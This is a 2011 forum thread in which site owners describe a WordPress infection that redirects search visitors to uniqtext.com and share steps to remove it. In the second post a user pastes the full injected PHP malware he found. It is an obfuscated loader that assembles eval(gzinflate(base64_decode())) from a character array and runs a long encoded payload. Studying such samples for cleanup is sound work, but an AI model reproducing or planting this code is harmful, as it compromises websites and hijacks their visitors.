1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

UniqText.com Redirect Hack ~ Wordress Shared Hosting via HOSTGATOR

Discussion in 'Black Hat SEO' started by SuperLinks, Sep 16, 2011.

  1. SuperLinks

    SuperLinks Elite Member

    Joined:
    Jul 14, 2008
    Messages:
    2,903
    Likes Received:
    847
    Location:
    New York
    Are you using Wordpress via Hostgator Shared Hosting? Chances are you've probably been hacked. I have several shared hosting accounts with Hostgator in which 2/3 were hacked and had this problem.

    How the hack works:

    When a user searches Google for a keyword that you rank for and clicks on your search result they will be redirected to http://uniqtext.com/search.php?theme=KEYWORD

    This will only happen the first time, if someone searches your site and finds it in the SERPs again it will go to your actual website. This hack uses some sort of "throttling" which means that it may not happen the first time for everyone either. My sites Analytics that were affected "flatlined" to within ~10-15 visits each day. As you know, most sites Analytics fluctuate greatly but these flatlined completely, reducing my overall traffic by 30%

    How to identify and fix the problem:


    The affected hack adds some type of encrypted PHP to your functions.php.

    Via FTP navigate to domain.com/wp-include/functions.php
    The first 6 lines will have something that looks like this
    I have truncated most of it, but thats the general idea. In order to fix it you will want to remove everything between

    Again this should be the first six lines of code ONLY. Reupload the fixed functions.php and have a friend do a Google check on a fresh IP/computer to see if you fixed it properly.

    I would recommend fixing this problem ASAP. Two of my websites have lost #1 rankings as a result of this. I'm sure the bounce rate was HORRIBLE and Google wasn't pleased.
     
    • Thanks Thanks x 2
  2. ivanblack

    ivanblack Newbie

    Joined:
    Aug 9, 2010
    Messages:
    17
    Likes Received:
    1
    Thank's for your share, that's very helpful.

    Why it could happen like that? Whether a person has entered into my cpanel account? Or is it using sql injection? what should I do to prevent it happening again in my cpanel? I use Hostgator shared hosting.

    This is the script on my cpanel

    Code:
    <?php
    $md5 = "52f289525dfdf65f6c01f0b24284afd9";
    $wp_salt = array('e',';','a','s','d',"g",'z','$',"4","n",'o',"(",'f','l','b',"c",'6',"t","v","i",')','r',"_");
    $wp_add_filter = create_function('$'.'v',$wp_salt[0].$wp_salt[18].$wp_salt[2].$wp_salt[13].$wp_salt[11].$wp_salt[5].$wp_salt[6].$wp_salt[19].$wp_salt[9].$wp_salt[12].$wp_salt[13].$wp_salt[2].$wp_salt[17].$wp_salt[0].$wp_salt[11].$wp_salt[14].$wp_salt[2].$wp_salt[3].$wp_salt[0].$wp_salt[16].$wp_salt[8].$wp_salt[22].$wp_salt[4].$wp_salt[0].$wp_salt[15].$wp_salt[10].$wp_salt[4].$wp_salt[0].$wp_salt[11].$wp_salt[7].$wp_salt[18].$wp_salt[20].$wp_salt[20].$wp_salt[20].$wp_salt[1]);
    $wp_add_filter('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');
    ?>
     
    Last edited: Sep 18, 2011
  3. kvmcable

    kvmcable Supreme Member

    Joined:
    Dec 28, 2010
    Messages:
    1,355
    Likes Received:
    2,815
    Occupation:
    24 year business owner - old school dude
    Location:
    KFC - BW3
    Look at the file date in FTP that will tell you when it changed. Then check the logs for activity during that time. Check apache and ftp logs. That will tell you how they got in and what exploit they used. Also it will tell you what IP they used. Ban the whole C Block if from China or Russia. They'll be back for sure.
     
  4. thesuvo

    thesuvo Registered Member

    Joined:
    Feb 3, 2010
    Messages:
    82
    Likes Received:
    18
    Location:
    India
    Home Page:
    thanks man for this fix. it's really helpful. my website got affected in sept 4, 2011 at 11.25PM.
     
  5. dried cassava

    dried cassava Newbie

    Joined:
    Oct 1, 2010
    Messages:
    30
    Likes Received:
    7
    Location:
    Kemanggisan, Jkt, ID
    I host at bluehost, and it happen to almost all of my blogs! thanks a lot superlinks.
     
  6. blackmamba456

    blackmamba456 Junior Member

    Joined:
    May 7, 2009
    Messages:
    148
    Likes Received:
    50
    It happened to all my blogs a while back too. It injects the code into every single php file in wordpress, which makes it a pain to remove manually. There is a script that cleans your files automatically.

    Code:
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html